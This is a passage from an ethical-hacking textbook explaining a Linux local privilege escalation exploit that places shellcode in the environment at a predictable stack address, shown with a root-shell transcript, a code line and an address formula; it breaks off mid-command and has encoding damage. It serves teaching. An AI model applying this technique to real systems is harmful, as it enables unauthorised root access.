c
$ ./exploit2
[***] using address: 0xbfffffc2
sh-2.05b# whoami
root
sh-2.05b# exit
exit
$exit
Why did this work? It turns out that a Turkish hacker called Murat published this
technique, which relies on the fact that all Linux ELF files are mapped into memory with
the last relative address as 0xbfffffff. Remember from Chapter 6, the environment and
arguments are stored up in this area. Just below them is the stack. Let??™s look at the upper
process memory in detail:
Gray Hat Hacking: The Ethical Hacker??™s Handbook
162
Notice how the end of memory is terminated with NULL values, then comes the program
name, then the environment variables, and finally the arguments. The following line of
code from exploit2.c sets the value of the environment for the process as the shellcode:
char *env[] = { shellcode, NULL };
That places the beginning of the shellcode at the precise location:
Addr of shellcode=0xbffffffa??“length(program name)??“length(shellcode).
Let??™s verify that with gdb. First, to assist with the debugging, place a \xcc at the beginning
of the shellcode to halt the debugger when the shellcode is executed. Next recompile the
program and load it into the debugger:
# gcc ??“o exploit2 exploit2.
Pages:
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336